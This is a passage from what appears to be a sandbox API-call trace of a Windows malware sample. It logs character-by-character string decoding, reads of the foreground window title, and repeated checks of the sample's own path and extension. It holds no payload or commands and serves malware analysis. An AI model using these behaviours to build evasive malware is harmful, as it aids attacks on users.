pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.226] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.226] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.227] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.274] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.275] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.275] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.275] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.276] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.277] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.277] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.277] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.278] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.278] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.279] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.279] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.279] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.280] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.280] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.281] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.281] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.282] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.282] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.282] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.283] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.283] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.283] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.284] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.284] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.285] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.285] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.286] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.286] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.286] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.287] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.287] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.287] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.288] GetForegroundWindow () returned 0x20086 [0180.288] GetLastError () returned 0x0 [0180.288] SysStringLen (param_1=" ") returned 0xff [0180.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.288] SysStringLen (param_1=" ") returned 0xff [0180.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.288] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.289] GetLastError () returned 0x0 [0180.289] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.289] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.292] SysStringLen (param_1="Pr") returned 0x2 [0180.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0180.293] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0180.293] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.293] GetFocus () returned 0x0 [0180.293] lstrlenA (lpString="Pr") returned 2 [0180.293] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0180.294] IsWindow (hWnd=0x103c4) returned 1 [0180.294] IsWindow (hWnd=0x103c4) returned 1 [0180.294] IsWindow (hWnd=0x103c4) returned 1 [0180.294] IsWindow (hWnd=0x103c4) returned 1 [0180.295] GetFocus () returned 0x0 [0180.295] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0180.295] GetFocus () returned 0x0 [0180.295] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0180.295] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0180.295] GetFocus () returned 0x0 [0180.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0180.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0180.296] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.296] VarBstrCmp (bstrLeft="Pr", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.296] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0180.296] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0180.296] GetTickCount () returned 0x1d19cea [0180.297] IsWindowVisible (hWnd=0x103b8) returned 0 [0180.297] Sleep (dwMilliseconds=0x0) [0180.336] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0180.337] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0180.338] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0180.339] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0180.339] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0180.339] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.340] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0180.340] GetTickCount () returned 0x1d19d18 [0180.340] GetTickCount () returned 0x1d19d18 [0180.340] GetTickCount () returned 0x1d19d18 [0180.340] GetTickCount () returned 0x1d19d18 [0180.341] IsWindowVisible (hWnd=0x103b8) returned 0 [0180.341] Sleep (dwMilliseconds=0x0) [0180.384] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0180.384] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0180.385] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0180.386] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0180.386] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0180.386] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.387] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0180.387] GetTickCount () returned 0x1d19d47 [0180.387] GetTickCount () returned 0x1d19d47 [0180.387] GetTickCount () returned 0x1d19d47 [0180.387] GetTickCount () returned 0x1d19d47 [0180.388] IsWindowVisible (hWnd=0x103b8) returned 0 [0180.388] Sleep (dwMilliseconds=0x0) [0180.435] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0180.435] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0180.437] FileSystemObject:IDispatch:GetIDsOfNames (in: 